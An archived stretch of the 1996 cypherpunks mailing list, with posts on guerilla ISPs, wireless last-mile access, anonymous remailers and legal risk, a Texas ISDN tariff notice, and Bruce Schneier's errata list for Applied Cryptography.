NiefPhys5wsKfSSzOeGbVzOTahmFJHofeY3qyhkCjycinLttSYtN7lAhwrskXbdx
8x/DjHBisOaloyEZPjpdSRshGi65ziUNhudEr+NAWdF3izZ/R0M3m6WkN7O7VH2S
8xh+SQWFA44=
=P+B0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 12:30:35 +0800
To: "J. Kent Hastings" <cypherpunks@toad.com>
Subject: Re: Inter-Patch Voice Network
Message-ID: <v02120d04ad0fb019b670@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:25 1/2/96, J. Kent Hastings wrote:
>-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Cpunx,
>
>This may be old hat, but now that PGPfone is available, why
>don't we start an "Inter-Patch" Network using PGP and ecash?

The time for that type of project is definitely here. There is a "Free
World Dial-up" project out there that offers free calls worldwide. It is
modeled after the remote printing fax network. <http://www.pulver.com/fwd/>

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Wed, 3 Jan 1996 17:38:08 +0800
To: ravage@ssz.com (Jim Choate)
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601030146.TAA02574@einstein.ssz.com>
Message-ID: <199601030240.UAA29676@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > From: Jeff Simmons <jsimmons@goblin.punk.net>
> > Subject: Re: Guerilla Internet Service Providers
> > Date: Tue, 2 Jan 1996 16:32:33 -0800 (PST)
> > 
> > Punknet is a 'Guerilla ISP'.  Twenty of us share a 128k ISDN line, 
> > distributed via high-speed modems.  It's been running fine for over
> > a year now, but Pacific Bell has evidently decided to get rid of us.
> > 
> > How?  Simply by refusing to either repair or replace our 25 pair trunk
> > line, which is rapidly degrading.  We've offered to replace it ourselves,
> > but according to them, it's illegal.  Right now, we've got three dead lines,
> > and two others that only will do 1200 baud.
> 
> Hmmm, you should have some kind of Public Utility Commission (PUC) in your area
> that regulates the service provider. Here in Texas if SWBT received more

Anyone else get two copies of this?  I don't think this is me...
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOnsgiS9AwzY9LDxAQF1RwQApz1hFlsNIMiX5cKf9Sy484HIg8N5WfDr
PX12AVDlfmbCxbMRAJ/lyfJMgEOYTEURinjg5rk53KLOA+TNimTyawl0sArIOvdQ
xJvklJQd3LFH6EfIg7pDXOiD/Rn6b/+bnDI4FBYL06C708cWWuWxcFGzghF9PWyI
mouSBFOl8zQ=
=lQ4N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 3 Jan 1996 14:31:06 +0800
To: cypherpunks@toad.com
Subject: FCC require ISDN? (fwd)
Message-ID: <199601030308.VAA02856@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 02 Jan 1996 20:40:25 -0600
> From: "David K. Merriman" <merriman@arn.net>
> Subject: FCC require ISDN?
> 
> At 07:46 PM 01/2/96 -0600, Jim Choate bespake thusly:
> 
> >The FCC is enacting a new regulation that will cause every phone company to
> >provide 100% of their service areas with ISDN (you should have received some
> >kind of notice last week, I did). This also sets some minimum standards as
> >well as to the type and quality of service the phone company must provide.
> 
> Citation? Here in Amarillo, if it rains, the phone lines start caving in,
> and I'd like to beat up SWBT for ISDN service :-)
> 
> Dave Merriman
> 
> PS - sorry for posting this to the whole list, but couldn't get this past my
> ISP to Jim directly :-(

Public Utility Commission of Texas
7800 Shoal Creek Blvd.
Austin, TX  78757

512-458-0256
512-458-0221

Please be advised that the PUC is not responsible for enforcing the
technical standards overall, that is the FCC. It is responsible for setting
rates and resolving problems with customers on specific problems.

The letter I received from SWBT is as follows:

Dear Customer:

On November 17, 1995, Southwestern Bell Telephone Company (SWBT) filed an
application (assigned Tariff Control No. 15024) concerning its ISDN-based
services, as required by the Public Utility Commission of Texas (Commission)
Substantive Rule (SR) 23.69 Integrated Services Digital Network (ISDN). ISDN
is a digital network architecture that provides a wide variety of services,
a standard set of user-network messages, and integrated access to the
network. Access methods to the ISDN are the Basic Rate Interface (BRI) and
the Primary Rate Interface (PRI).

This application does not increase the currently approved rates or optional
ISDN based services (i.e. SWBT's DigiLine(sm), SmartTrunk(sm), SelectVideo
Plus(sm) and PLEXAR(sm) ISDN services) and their features.

SR 23.69 sets forth the requirements for the provision of optional
ISDN-based services. In accordance with SR 23.69, at a minimum, ISDN-based
services shall comply with National ISDN-1 and National ISDN-2 Standards and
be capable of providing end-to-end digital connectivity. SWBT's application
includes the offering  of ISDN with PLEXAR(sm) II Service and new features
to DigiLine(sm) and SmartTrunk(sm) Services to meet the standards required
to meet standards required by SR 23.69. Also, SBWT is proposing in this
application to eliminate the minimum station requirement for PLEXAR II(sm)
Service and the offering of occassional user plan for DigiLine(sm) Service
to future customers. In addition, SR 23.69 requires SWBT to make ISDN-based
services available to all its exchanges in Texas by July 1, 1996. SWBT is
currently offering ISDN-based services in its exchanges comprised in the
Abilene, Amarillo, Austin, Brownsville, Dallas, El Paso, Houston, Lubbock
and San Antonio LATAs. In compliance with the rule, SWBT will make
ISDN-based services available in its remaining exchanges comprised in the
Beaumont, Corpus Christi, Hearne, Longview, Midland, Waco, and Wichita Falls
LATAs by July 1, 1996. SR 23.69 also establishes the effective date of this
application to be no later than July 1, 1996. The new optional ISDN-based
service and features are expected to generate first year net revenues of
approximately $372,000.

Persons who wish to comment on this application should notify the Commission
by January 12, 1996. Requests for further information should be mailed
(faxed material is not acceptable for filling) to the Public Utility
Commission of Texas, 7800 Shoal Creek Blvd., Austin, Texas 78757, or you may
call the Public Utility Commission Public Information Office at 512-458-0256
or 512-458-0221 for text telephone.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 18:27:40 +0800
To: Carl Ellison <cme@clark.net>
Subject: Re: Foiling Traffic Analysis
Message-ID: <v02120d05ad0fbf5cf93c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:21 1/2/96, Carl Ellison wrote:

>This is merely a technical means for producing anonymous communications.
>
>Anonymity = conspiracy?

Poll after poll shows that the majority of Americans is eager to allow
warrantless searches of their homes and property to aid the War on Drugs.
Every non-CP person that I tell about remailers asks me "This is legal?".
Meaning that they would expect it to be illegal. Surely a prohibition
against anonymous remailers and especially against DC nets is a small prize
to pay for perceived security against the Four Horsemen...

Inevitably, a DC net or the Token Ring approach described earlier will be
used for illegal purposes. Once, not if, that comes to pass all
participants will be guilty of conspiracy and their property subject to
forfeiture. No trial needed and it will happen to the applause of the
general public.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 3 Jan 1996 15:00:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601022027.VAA24980@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks write code. With that phrase and the wave of attempts to 
censor the 'Net, I've embarked on a quest to make remailers easier to use.

Has anyone written an easy to use Windows or DOS application that will let
someone chain a message through several remailers, perhaps with support
for the mailer at alpha.c2.org? 

Would the writer of such a program, if in the US fall under the provisions
in ITAR? Obviously, calls to the PGP program would have to be made. I
recall reading that such hooks do fall under the ITAR. If this is true, so
much for a more user friendly version of chain for the masses. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 3 Jan 1996 15:02:42 +0800
To: cypherpunks@toad.com
Subject: no subject (file transmission)
Message-ID: <199601030329.VAA04190@parka>
MIME-Version: 1.0
Content-Type: text


                  APPLIED CRYPTOGRAPHY, Second Edition
                               ERRATA
                     Version 1.0 - 3 January 1996


This errata includes all errors I have found in the book, including minor
spelling and grammatical errors.  Please distribute this errata sheet to
anyone else who owns a copy of the book.


Page 11:  Line 18, the reference should be "[703]" and not "[699]".

Page 13:  Fifth paragraph, first sentence, should read: "The German Enigma
had three rotors, chosen from a set of five,...."

Page 14:  The last sentence should read:  "The smallest displacement that
indicates a multiple of the key length is the length of the key."

Page 16:  Third line from the bottom, "1.44" makes more sense as "1.544".

Page 18:  Table 1.1, second item.  1 in 4,000,000 is 2^22.

Page 53:  Second to last sentence about SKEY should read: "Similarly, the
database is not useful to an attacker."

Page 61:  Step (3), the second message should contain A instead of B.

Page 62:  In the third line, there's a comma missing.

Page 63:  Second protocol, step (2), the second message should be
"S_T(C,K_C)".

Page 70:  In the first step (4), the equation should be "R XOR S = M".  In
the second step (2), it should be "to generate U".

Page 77:  In step (2), the message is signed with Trent's private key.  And
T_n is mistakenly both the time and the timestamp.

Page 82:  Fourth line from the bottom, the correct expression is "up and
died."

Page 99:  Tenth line from the bottom, delete the second word: "will".

Page 104:  Graph isomorphism has never been proven to be an NP-Complete
problem.  It does seem to be hard, and is probably useful for cryptography.

Page 105:  In Step (2), Peggy gives Victor a copy of H'.

Page 112:  Step (1) should read "Alice takes the document and multiplies it
by a random value."

Page 116:  The protocol could be worded better.  Step (3) should begin:
"Alice decrypts Bob's key twice, once with each of her private keys."  Step
(4) should begin: "Alice encrypts both of her messages, each with a
different one of the DES keys...."

Page 126:  The "Voting with Blind Signatures" protocol is a little more
complicated.  The voter does not send all the blinding factors in step (2). 
The CTF requests 9 of 10 blinding factors in step (3), and the voter sends
only those blinding factors to the CTF.

Page 134:  Another problem with this protocol is that there are numerous
ways that various participants can cheat and collude to find out the salary
of another participant.  These cheaters can misrepresent their own salaries
during their attack.

Page 135:  Lines 13-14; technically Alice and Bob get no additional
information about the other's numbers.

Page 136:  Lines 14-15; technically Alice and Bob get no additional
information about the other's numbers.

Page 144:  Line 27, the odds should be "1 in n".  Line 29, "step (2) should
be "step (1)".

Page 161:  In the eleventh line from the bottom, "harnesses" should be
"harnessed".

Page 181:  Line a should read "he does not know it" instead of "he does
know it".

Page 195:  In line 13, the reference number should be [402].

Page 201:  Error Propagation, lines 5-6.  The sentence should read: "In 8-
bit CFB mode, 9 bytes of decrypted plaintext are garbled by a single-bit
error in the ciphertext."

Page 202:  Third to last line, toggling individual bits does not affect
subsequent bits in a synchronous stream cipher.

Page 203:  Section 9.8, both equations should be "S_i = E_K(S_(i-1))".

Page 209:  Table 9.1.   CFB, Security: Bits of the last block can be
changed, not the first.  CFB, Efficiency: The speed is the same as the
block cipher only in 64-bit CFB.  CFB and OFB, Efficiency: "Ciphertext is
the same size as the plaintext" should be a plus.

Page 217:  The Table 10.1 headers got garbled.  They should be:
"Algorithm", "Confidentiality", "Authentication", "Integrity", and "Key
Management".

Page 246:  The last line should be: "#define isEven(x) ((x & 0x01) == 0)".

Page 249:  Line 9, "Euclid's generalization" should be "Euler's
generalization".

Page 251:  Lines 20-21.  The sentence should read: "For example, there are
11 quadratic residues mod 35: 1, 4, 9, 11, 14, 15, 16, 21, 25, 29, and 30." 
See page 505 for more details.

Page 258:  In line 27, his name is spelled "Chandrasekhar".

Page 275:  Table 12.4; it should be a "48-Bit Input".

Page 281:  In line  4, "minuscule" is misspelled as "miniscule".

Page 287:  In Figure 12.6, there should be no period in X or Y.

Page 292:  Second line, "b_24" should be "b_26".  In line 10, "1/2 - .0061"
should be "1/2 + .0061".

Page 295:  Third line from the bottom, 2^(120/n) should be (2^120)/n.

Page 300:  In the first line, "56" should be "48".

Page 319:  In line 11, Section "25.13" should be "25.14".

Page 322:  Last line, the chip is 107.8 square mm.

Page 338:  In Figure 14.3 and in the first line, "f" should be "F".

Page 340:  Second equation should be "mod 256".

Page 341:  The current variants of SAFER are SAFER SK-40, SAFER SK-64, and
SAFER SK-128, all with a modified key schedule, in response to a
theoretical attack by Lars Knudsen presented at Crypto '95.

Page 345:  Lines 10 and 11; the + should be a -.

Page 346:  The reference number for BaseKing should be [402].

Page 352:  In line 8, that second "l" should be an "r".

Page 358:  In the decryption equation of Davies-Price mode, the final D
should be an E.

Page 362:  In the first equation, P is used to indicate both padding and
plaintext.  If P is plaintext and p is padding, then the equation should
be: C = E_K3(p(E_K2(p(E_K1(P))))).

Page 362:  Figure 15.2 is wrong.  The middle and top rows of "Encrypt," and
the plaintext feeding them, are shifted right by 1/2 block from where they
should be.

Page 363:  The parenthetical remark would be clearer as: "encryption with
one of n different keys, used cyclically".

Page 363:  Second to last line, the equation should have an I_2 in place of
the I_1.

Page 367:  Second equation, "P XOR K_3" should be "C XOR K_3".

Page 369:  A maximal period linear congruential generator as a period of m,
not m-1.

Page 375:  Third paragraph should read:  "It is easy to turn this into a
maximal period LFSR.  The highest exponent is the size of the register, n. 
Number the bits from n-1 to 0.  The numbers, including the 0, specify the
tap sequence, counting from the left of the register.  The x^n term of the
polynomial stands for the input being fed into the left end."  The next
paragraph is wrong.

Page 379:  Second line of code has an extra close parentheses.

Page 380:  The forth line should begin: "On the other hand, an
astonishingly...."

Page 393:  In Figure 16.16, there should be an arrow from b_4 to the Output
Function.

Page 393:  Second sentence should be: "It's a method for combining multiple
pseudo-random streams that increases their security."

Page 429:  The second sentence should be: "It returns a fixed-length hash
value, h."

Page 431:  In step (2), "prepend" instead of "append".

Page 440: In item 3, there is an "AND" missing in the equation.

Page 441:  The compression function of MD2 is confusing without the
indentations.  The two for-loops are nested, and include the next two
statements.

Page 444:  In figure 18.7, the a, b, c, d, and e variables are backwards.

Page 445:  Line 14, SHA should be compared to MD4.

Page 447:  Lines 3-4 should read: "...CBC in [1145], CBC in [55,56,54]...."

Page 449:  Figure 18.9, M_i and H_i-1 in the upper-left diagram should be
reversed.

Page 456:  Table 18.2.  Encryption speed should be in "kilobytes/second",
and "SNEERU" should be "SNEFRU".

Page 457:  Lines 3 and 4, the ending "-1" and "-2" should be superscripts.

Page 465:  In the third line of text, the number should be n^-1.

Page 470:  The second to last line is missing an "is".

Page 480:  An additional reference for elliptic-curve cryptosystems is N.
Koblitz, A Course in Number Theory and Cryptography, Springer-Verlag, 1988. 
This is an excellent book, and omitting it was an oversight.

Page 489:  Caption to Table 20.3 should specify an "80386 33 MHz personal
computer".

Page 495:  In Step (8), the constant should be "0x7fffffff".

Page 497:  Delete the fourth equation in the list of verification
equations.

Page 499:  ESIGN, seventh line:  "m-1 should be "n-1".

Page 505:  In step 3, the third sentence should be:  "If Victor's first bit
is a 1, then s_1 is part of the product...."

Page 514:  In step (1), Alice must sent X to Bob.

Page 515:  In line 1, "commutitive" is misspelled as "communitive".

Page 515:  Hughes.  Step (2): In order for step (4) to work, y must be
relatively prime to n-1 else the inverse function in step (4) won't work. 
If n is a strong prime such that (n-1)/2 is also prime, then y can be any
odd random large integer except for (n-1)/2.  In step (4), Bob computes:
z=y^-1 mod (n-1).

Page 516:  In the Station-to-Station protocol, the exponentiation is
missing.  In step (1), Alice sends Bob g^x mod p.  In step (2), Bob
computes the shared key based on g^x mod p and y.  He signs g^x mod p and
g^y mod p, and encrypts the signature using k.  He sends that, along with
g^y mod p, to Alice.  In step (3), Alice sends a signed message consisting
of g^x mod p and g^y mod p, encrypted in their shared key.

Page 529:  Line 13 should be a polynomial of degree 5, not 6.

Page 535:  The technique wherein Mallory leaks 10 bits of DSA secret per
signature, can be sped up by a factor of 16 or so.  Instead of choosing a
4-bit block randomly and then searching for a k that leaks
the correct 14 bits, he can just use the low 4 bits of r to select the
block of the signature to leak (no need to have an opaque subliminal
channel) and he only has to check an average of 1024 k values until the
bits sent out over the 10 subliminal channels match the 10 bits of the
secret selected by r = (g^k mod p) mod q.

Page 568:  In the Kerberos Version 5 Messages, step 3, the final "s" should
not be subscripted.

Page 586:  Figure 24.7, in the key the arrow should point from y to x.

Page 586:  Seventh line, "revokation" should be spelled "revocation".

Page 589:  Section 24.15, fourth line:  "Nambia" should be "Namibia".

Page 592:  The equation is wrong.  The structure of the LEAF is
"E_KF(U,E_KU(K_S),C)", where U is the 32-bit unit ID, K_S is the 80-bit
session key, and C is a 16-bit checksum of K_S and the IV (and possibly
other material) used by the receiving chip to ensure that it has a valid
LEAF.

Page 604:  Fourth line from the bottom should read: "to U.S. patent law."

Page 606:  In lines 12 and 13, the cross-references are to chapter 18.

Page 607:  In Table 25.4, the column headers are reversed.

Page 610:  Sixth line should read "it is filed", not "it is filled".

Page 683:  In reference 210, the title of the paper is "A Comparison of
Three Modular Reduction Functions".

Page 705:  In reference 727, subscript should be a superscript.

This errata is updated periodically.  For a current errata sheet, send a
self-addressed stamped envelope to:   Bruce Schneier, Counterpane Systems,
101 East Minnehaha Parkway, Minneapolis, MN  55419; or send electronic mail
to: schneier@counterpane.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Wed, 3 Jan 1996 10:51:28 +0800
To: cypherpunks@toad.com
Subject: Unmuzzy Explained
Message-ID: <Pine.LNX.3.91.960102195324.7739A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


So is the idea beyond this that if file or a group of files were to 
be distributed over many computers (possibly hundreds or more) then 
none of the computers would be "responsible" for their content? I would 
think that any participant in the network would have to claim full 
responsibility for the content, assuming the file(s) could be accessed 
from any of the participating servers.

I'd be interesting in joining the Unmuzzy (programmers) mailing list, does 
anyone know what the email is or where the home page is? A net search 
returned nothing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markh@wimsey.bc.ca (Mark C. Henderson)
Date: Wed, 3 Jan 1996 18:23:58 +0800
To: cypherpunks@toad.com
Subject: Re: Errata for _Applied Crypto_
Message-ID: <m0tXLty-0000qPC@vanbc.wimsey.com>
MIME-Version: 1.0
Content-Type: text/plain


Wink Junior <winkjr@teleport.com> writes:
> Bruce Schneier <schneier@counterpane.com> has an errata file for the second
> edition of _Applied Cryptography_ available on request.  Hopefully he will
> also make it available via the Web.  Hats off to Bruce for making this
> information available in a timely, cost-effective manner.

It is available from the Wimsey crypto archive (thanks Bruce!)

ftp://ftp.wimsey.com/pub/crypto/Doc/applied_cryptography/2nd_ed_errata-1.0


-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.6.1.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 3 Jan 1996 15:22:52 +0800
To: cypherpunks@toad.com
Subject: Re: Why Net Censorship Doesn't Work
Message-ID: <ad0f437c0702100409f4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:17 PM 1/2/96, Duncan Frissell wrote:

>That would require outlawry of crypto over the backbone and some way of
>convincing the backbone to run government approved code.  Quite a bit of
>resistance would ensue.  Have the Feds ever successfully mandated that large
>numbers of people run government code?

Aren't we all using Ada?


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jan 1996 18:28:06 +0800
To: Peter Monta <pmonta@qualcomm.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXM1f-0008zOC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:37 PM 1/2/96 -0800, you wrote:
>> It seems to me that phone line costs are turning into a floor price for
>> Internet access, when they shouldn't really be.  The main asset telephone
>> companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
>> park that allows you to run  your own dedicated copper pairs, and you've
>> bypassed $25/month/line business phone line charges. 
>> 
>> At some point, individual urban and suburban blocks could easily be
>> "guerilla re-wired" for ISP access without serious trenching, etc.  The
>> phoneco would still be involved, but in a far lower-profit mode, as the
>> supplier of a single T1 to a multi-block area.  
>
>For the "last mile" to the ISP user, wireless could be a better bet.
>Have antenna, will surf.

Yes, you're absolutely right.  It would be great if some entrepreneur could
buy a T1, put up a 2000 MHz (or somewhere around that; whatever frequency
was allocated appropriately) local "cellular" data system which would be
able to connect to up to, say, 100 simultaneous  or so local users using
modems little more complicated than a current 900 MHz cordless phone.  Okay,
maybe all this stuff is already being worked on at a few dozen or hundred
companies around the globe, but I can't wait...  



>(Not speaking for Qualcomm, etc.)
>
>Peter Monta   pmonta@qualcomm.com
>Qualcomm, Inc./Globalstar

Question:  Is this the "Qualcomm" that does the Internet access software, or
the "Qualcomm" who builds the wireless amps/filters/hardware/etc?   Or is it
all the same company?!?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 3 Jan 1996 18:27:09 +0800
To: accessnt@ozemail.com.au (Mark Neely)
Subject: Re: US calls for measures against Internet porn
In-Reply-To: <199601030047.LAA07011@oznet02.ozemail.com.au>
Message-ID: <199601030549.VAA11513@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> You can't tell me that someone who fires up their Web browser and points it
> to http://www.playboy.com, or clicks yes to a request that they acknowledge
> that they are over 18/21/majority and agree to access adult material doesn't
> know what they are getting themselves into...

	Just to offer another story of the cluelessness of some
people: I've been receiving a number of complaints about one of my
users who has gotten into a flamewar on Usenet. They claim that
flaming is a violation of FCC regulations. (Maybe eventually it will
be.. sigh.)

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Wed, 3 Jan 1996 14:24:51 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
In-Reply-To: <199601030331.TAA27550@netcom2.netcom.com>
Message-ID: <199601030611.WAA13284@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) wrote:

> Don't forget about infrared to cross public rights-of-way.

What about fog?

> I have long dreamed of tossing a piece of coax over the fence to my
> neighbors.

That's not difficult.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jan 1996 20:11:08 +0800
To: ecarp@netcom.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXMnW-0008z2C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:09 PM 1/2/96 -0600, you wrote:

>> For the "last mile" to the ISP user, wireless could be a better bet.
>> Have antenna, will surf.
>
>I can easily visualize mobile and portable systems linking to an ISP, 
>downloading email via encrypted POP/UUCP/whatever, using itinerant 2m or 
>450 MHz frequencies.  A mobile system connects to any ISP, gets a login: 
>prompt, enters "xyz@host.domain", gets thrown into a POP session on 
>host.domain, uploads/downloads, then disconnects.  All it would really 
>require is implementing "exec rlogin -l xyz host.domain" into getty (a 
>very simple patch) and suitable crypto protocols...
>- --
>Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com

As a ham, too (N7IJS) I recognize your implicit selection of 2m or 450 MHz.
But I gently object to this, for reasons that I think will be obvious.
First, technology has been marching on in the last 10-20 years, and
communications frequencies of 2 GHz and more are technically do-able and
comparatively empty.  (and with modern IC  technology, even easy)
Secondly,  ham gear tends to be used for long-range communication (miles and
watts) and generally has little or no ability to frequency hop/time hop or
to automatically turn down transmitter power to be able to share frequencies
over short distances (low milliwatts or even microwatts).  Those high
gigahertz frequencies would be ideal for communication over a few blocks
distance.  (Sure, packet has been done for years but it is a still-born
development;  they still think 9600 bps is a "fast" modem speed.)

I forsee  locally-owned boxes that are the equivalent of a wireless phone
switch implementing re-used freuqency microcells; the cost SHOULD be far
lower than the current copperline phone systems, once the telephones are
paid for.  And they shouldn't cost much more than current 900 MHz cordless
telephones, too.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Wed, 3 Jan 1996 20:11:53 +0800
To: jimbell@pacifier.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <0099BCED.4820A3A0.346@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <m0tXAsV-00090IC@pacifier.com>, jim bell <jimbell@pacifier.com> wrote:

# It seems to me that phone line costs are turning into a floor price for
# Internet access, when they shouldn't really be.  The main asset telephone
# companies have, right now, is in RIGHTS OF WAY.  Put an ISP in a business
# park that allows you to run  your own dedicated copper pairs, and you've
# bypassed $25/month/line business phone line charges. 

# At some point, individual urban and suburban blocks could easily be
# "guerilla re-wired" for ISP access without serious trenching, etc.  The
# phoneco would still be involved, but in a far lower-profit mode, as the
# supplier of a single T1 to a multi-block area.  

I had a similar thought about a month ago.  In particular, I was thinking that
skyrise office buildings would be a great market for ISPs to target.  Rent a
closet in the basement/top floor close to the telco demarc.  Run lots of UTP to 
the cients through the existing conduit, ceiling acces, air ducts, or whatever
and boom, lots  of clients, low overhead, telco bills cut to 1/2 of the
competitions'.  Up-front costs might (or might not be) higher, since the wire
installation would now be the burden of the ISP.

ObCrypto: Wiring overhead could be reduced if the building network was moved
away from a star configuration to something closer to a backbone with multiple
physical subnets (say, per floor.)  How do you keep your next door neighbor
from sniffing your traffic on the same subnet?  Encrypt it, silly...  For
performance reasons, truly local traffic could be in the clear, but traffic
between the clients' routers and the ISP's would run through something that
could keep up with the ISP's max throughput on the ISP's outside interface.

You might read "Firewall with encrypted tunnels" for "router" in the paragraph
above.  If you do, then you have the infrastructure for supporting "secure"
trans-Internet traffic.

Of course we're not talking about $25.00/mo. service with a $50.00 setup 
anymore, but low-ish priced, "secure" 56Kb/s, fractional T1, T1, and even T3
seem to be where corporate America/Earth wants to go.

FWIW, (and if anyone winds up doing something like this, I want a "finders
fee" ;-) )

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 3 Jan 1996 12:17:25 +0800
To: cypherpunks@toad.com
Subject: altavista.digital.com
Message-ID: <9601030354.AA29834@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From a friend at work.  Marginal crypto relevance but useful for alerting
those who think public mailing lists and Usenet are one-time pads. :)

>A friend of mine at Digital implemented the Alta Vista search engine.
>Here's the configuration he's working with today, with plans for scaling
>as necessary.
>
>>The web index is built and queried by a two processor 300MHz Alpha.
>>There's 2GBytes of RAM and 200GBytes of disc on RAID controllers.
>>We'll have to expand if load really takes off.     There are other,
>>smaller machines doing the HTTP server, the news index, the news spool,
>>and the web robot.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas F. Elznic" <delznic@storm.net>
Date: Wed, 3 Jan 1996 13:04:20 +0800
To: cypherpunks@toad.com
Subject: 2047 bit keys in PGP
Message-ID: <2.2.16.19960103035752.3e0fe0d8@terminus.storm.net>
MIME-Version: 1.0
Content-Type: text/plain


What is the deal with the 2047 bit keys? How do you produce one? IS it
compatible with international versions?
--
==================Douglas Elznic===================
                 delznic@storm.net
           http://www.vcomm.net/~delznic/
            (315)682-5489 (315)682-1647
               4877 Firethorn Circle
                 Manlius, NY 13104
    "Challenge the system, question the rules."
===================================================
PGP key available:
http://www.vcomm.net/~delznic/pgpkey.asc
PGP Fingerprint:
 68 6F 89 F6 F0 58 AE 22  14 8A 31 2A E5 5C FD A5 
===================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Goerzen <goerzenj@complete.org>
Date: Wed, 3 Jan 1996 20:17:16 +0800
To: Steve14571@aol.com
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <951231091526_102864093@mail06.mail.aol.com>
Message-ID: <Pine.BSF.3.91.960102230047.229B-100000@complete.org>
MIME-Version: 1.0
Content-Type: text/plain


I have not been a CompuServe subscriber for years.  But I do remember how 
things worked.

It is my _assumption_ that the Usenet gateway operates by importing all 
Usenet news into the CompuServe system, at which point users can access it.

CompuServe is not location-dependant.  The network operates exactly the 
same regardless of calling location (indeed, the system doesn't even know 
where you're calling from I believe).  It is a worldwide CompuServe 
Network that people use to access it.  This network just allows dialups 
and then gets the users connected to the CompuServe computers.  The main 
computers handle all traffic.  They don't are location-independant, 
making it impossible to block access based on location.

--
John Goerzen, programmer and owner | Merry Christmas!                    |
